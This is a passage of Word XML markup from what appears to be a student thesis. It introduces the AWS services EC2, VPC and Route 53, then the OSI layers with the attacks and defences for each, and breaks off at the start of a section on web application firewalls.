          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r w:rsidR="000D7B5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>presence. Today, AWS’s global infrastructure map shows that they are in 25 regions with 80 availability zone ha</w:t>
      </w:r>
      <w:r w:rsidR="00C56CA2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="000D7B5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> over 230 points of presence</w:t>
      </w:r>
      <w:r w:rsidR="003E414E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PoP)</w:t>
      </w:r>
      <w:r w:rsidR="000D7B5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF69DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>With their current infrastructure, they have been able to serve their services to 245 countries and territories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1719D" w14:textId="4B7DC946" w:rsidR="003E4215" w:rsidRDefault="00CA0763" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Over the years, AWS released a slew of services</w:t>
      </w:r>
      <w:r w:rsidR="003E4215">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E2F41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Its first service was Elastic </w:t>
      </w:r>
      <w:r w:rsidR="00B81F7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Compute Cloud</w:t>
      </w:r>
      <w:r w:rsidR="005E2F41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EC2). </w:t>
      </w:r>
      <w:r w:rsidR="003E4215">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Today, AWS offers</w:t>
      </w:r>
      <w:r w:rsidR="00FE5F61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> more than</w:t>
      </w:r>
      <w:r w:rsidR="003E4215">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200 fully featured services</w:t>
      </w:r>
      <w:r w:rsidR="00150FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, with EC2 believed to be its most popular service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000F3295">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Of the long list of services offered by AWS, only </w:t>
      </w:r>
      <w:r w:rsidR="00FD389A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidR="000F3295">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were used in this thesis; EC2</w:t>
      </w:r>
      <w:r w:rsidR="00FD389A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, virtual private cloud (VPC)</w:t>
      </w:r>
      <w:r w:rsidR="000F3295">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Route 53.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F123483" w14:textId="07041ECE" w:rsidR="00B514AF" w:rsidRDefault="00B514AF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servers could be a handful for most people. Physical servers are not only expensive to buy but also to maintain. There are many factors to consider, </w:t>
      </w:r>
      <w:r w:rsidR="00716543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>such as, cost, location and environment for the server, storage, security and more.</w:t>
      </w:r>
      <w:r w:rsidR="0031041A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009046A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This is where </w:t>
      </w:r>
      <w:r w:rsidR="0031041A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS’s EC2 makes </w:t>
      </w:r>
      <w:r w:rsidR="009046A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="0031041A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> easy for consumers. As EC2 is categorised as IaaS, the consumer can focus on setting up their servers </w:t>
      </w:r>
      <w:r w:rsidR="00565442">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0003086E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>also known as</w:t>
      </w:r>
      <w:r w:rsidR="00565442">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> instances) </w:t>
      </w:r>
      <w:r w:rsidR="0031041A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and get their services up and running through a web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD8BBC" w14:textId="2144598B" w:rsidR="00565442" w:rsidRDefault="00984B26" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, </w:t>
      </w:r>
      <w:r w:rsidR="004678A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VPC is a virtual network which can be provisioned as an isolated section. Consumers are given full control over the VPCs they create. The control enables consumers to manage the networking configurations such as IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="00A26C7F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IPv4 and IPv6)</w:t>
      </w:r>
      <w:r w:rsidR="004678A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, subnets, routing tables and network gateways.</w:t>
      </w:r>
      <w:r w:rsidR="006018E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consumers can make use of multiple VPCs to fit their needs. An example could be creating two VPCs, one public facing and the other private. The public facing VPC could be used for web servers that are given access to the Internet and the private facing VPC could be used for backend systems (AWS, 202</w:t>
      </w:r>
      <w:r w:rsidR="00603832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006018E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2AAFA" w14:textId="5AC1EB2B" w:rsidR="00714386" w:rsidRDefault="00670600" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Finally,</w:t>
      </w:r>
      <w:r w:rsidR="008A2C99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Route 53 service as a Domain Name Service (DNS) as highly scalable and available.</w:t>
      </w:r>
      <w:r w:rsidR="00E17AA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Route 53 is used to connect AWS’s running infrastructure such as EC2 to user requests and vice versa.</w:t>
      </w:r>
      <w:r w:rsidR="009A306B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Route 53 provides consumers the option to buy or use their existing domain names. Route 53 will then configure DNS settings for the domain names automatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AWS, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="009A306B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF4520" w14:textId="7C703F72" w:rsidR="001E4178" w:rsidRPr="008E535B" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc71138479"/>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="006C227B">
        <w:t>Open Systems Interconnection (</w:t>
      </w:r>
      <w:r w:rsidR="001E4178" w:rsidRPr="008E535B">
        <w:t>OSI</w:t>
      </w:r>
      <w:r w:rsidR="006C227B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001E4178" w:rsidRPr="008E535B">
        <w:t xml:space="preserve"> Layers</w:t>
      </w:r>
      <w:r w:rsidR="004E5968">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB6F7D">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="004E5968">
        <w:t>Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="73F0A4B7" w14:textId="64B05E78" w:rsidR="001E4178" w:rsidRDefault="004E5968" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The OSI model is a universal model used to understand networks. There are a total of seven layers in the OSI model</w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> physical layer, </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">data link layer, </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">network layer, </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">transport layer, </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">session layer, </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">6) </w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">presentation layer and </w:t>
      </w:r>
      <w:r w:rsidR="00CF4FEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7)</w:t>
      </w:r>
      <w:r w:rsidR="00391AE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> application layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA1289" w14:textId="53915CFC" w:rsidR="00DC6169" w:rsidRDefault="00DC6169" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Briefly looking into the OSI layers</w:t>
      </w:r>
      <w:r w:rsidR="000206FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as described by Imperva (</w:t>
      </w:r>
      <w:r w:rsidR="00FD17EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidR="000206FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the physical layer is responsible for all physical aspects of the network such as cables</w:t>
      </w:r>
      <w:r w:rsidR="000747FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and transmission of raw data. The data link layer is responsible for establishing and terminating connection between network nodes. The network layer is responsible for deciding the best physical path to take and breaking segments into packets at the source and reassembling at the destination.</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>transport layer is responsible for transmitting data through the use of transmission protocols such as</w:t>
      </w:r>
      <w:r w:rsidR="00F67044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> transmission control protocol</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00F67044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00F67044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>user datagram protocol (</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00F67044">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001901A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The Session layer is responsible for handling the network connection.</w:t>
      </w:r>
      <w:r w:rsidR="00610B9F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The presentation layer is responsible for preparing the data to be used by applications in the correct formats and encrypting it. The final layer, application layer is responsible for providing protocols</w:t>
      </w:r>
      <w:r w:rsidR="00352F83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as HTTP and DNS</w:t>
      </w:r>
      <w:r w:rsidR="00610B9F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, allowing applications to send and receive the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106B1F8" w14:textId="77E89D6A" w:rsidR="00672FF4" w:rsidRDefault="00672FF4" w:rsidP="00BC6950">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E64C6F" wp14:editId="660F3A41">
            <wp:extent cx="5057775" cy="4010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7775" cy="4010025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBEE42" w14:textId="3CD4D610" w:rsidR="00BC6950" w:rsidRDefault="00BC6950" w:rsidP="00BC6950">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc71138521"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="001F453C">
        <w:t xml:space="preserve">Summary of OSI layers (Imperva, </w:t>
      </w:r>
      <w:r w:rsidR="00FD17EB">
        <w:t>2020)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5398C4EC" w14:textId="0A1558E5" w:rsidR="000206FB" w:rsidRDefault="00D337EC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Each layer is susceptible to different attacks and can be protected by the use of different tools. Such tools include WAF, firewall, encryption, intrusion prevention system (IPS) or intrusion detection system (IDS) and physical security resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFFE17" w14:textId="38BE34E1" w:rsidR="00C50F35" w:rsidRDefault="00C50F35" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">WafCharm, 2020, shared a list </w:t>
      </w:r>
      <w:r w:rsidR="000347AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>containing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> some examples of attacks and its countermeasures for each of the OSI layer.</w:t>
      </w:r>
      <w:r w:rsidR="00250F22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Physical layer is susceptible to physical threats such as break-ins or fire. The countermeasure would be to deploy necessary physical security resources. The data link, network, transport and session layers are susceptible </w:t>
      </w:r>
      <w:r w:rsidR="00832A88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">to attacks such as distributed </w:t>
      </w:r>
      <w:r w:rsidR="00832A88">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>denial of service (DDoS), IP spoofing and eavesdropping. Tools and implementations that could help to prevent and mitigate such attacks include firewall, encryption and IPS/IDS.</w:t>
      </w:r>
      <w:r w:rsidR="000566B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The presentation and application layers are susceptible to attacks as described in OWASP top 10 and can be prevented or mitigated by implementing proper configurations, secure programming and the use of WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88EE86" w14:textId="6EA4E193" w:rsidR="00886AF4" w:rsidRPr="009A306B" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc71138480"/>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00886AF4" w:rsidRPr="009A306B">
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3C336C63" w14:textId="719DA818" w:rsidR="00886AF4" w:rsidRDefault="006001EA" w:rsidP="00886AF4">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Web Application Firewalls (</w:t>
      </w:r>
      <w:r w:rsidR="00886AF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WAFs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00886AF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are essential tools today to protect web applications from attacks. WAFs are essentially firewalls. A firewall is a network tool or device that monitors and detects inbound and outbound traffic. Then, based on the defined security rule sets, it decides if the traffic should be allowed or blocked. </w:t>
      </w:r>
      <w:r w:rsidR="005D4F22">
        <w:rPr>
